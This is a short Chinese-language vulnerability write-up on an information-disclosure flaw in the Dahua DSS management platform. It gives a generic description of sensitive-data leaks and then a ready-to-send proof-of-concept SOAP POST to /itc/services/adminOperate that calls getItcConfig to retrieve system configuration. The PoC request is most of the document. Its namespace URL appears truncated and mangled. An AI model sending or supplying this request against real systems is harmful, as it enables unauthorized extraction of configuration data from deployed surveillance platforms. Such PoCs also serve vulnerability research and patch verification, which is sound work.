漏洞描述
敏感信息泄露漏洞是指由于系统或应用程序的安全措施不足,导致敏感信息(如用户数据、系统配置、内部通信等)被未授权的第三方获取。这种漏洞可能由于不当的配置、缺乏访问控制、不安全的数据处理和传输等原因造成。攻击者可能利用泄露的信息进行进一步的攻击,如身份盗窃、欺诈、数据篡改等。
大华DSS综合管理平台 /itc/services/adminOperate 信息泄露漏洞
PoC代码
POST /itc/services/adminOperate HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Soapaction:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/%22 xmlns:adm="http://adminoperateservice.webservice.dssc.dahua.c...">
<soapenv:Header/>
<soapenv:Body>
<adm:getItcConfig/>
</soapenv:Body>
</soapenv:Envelope>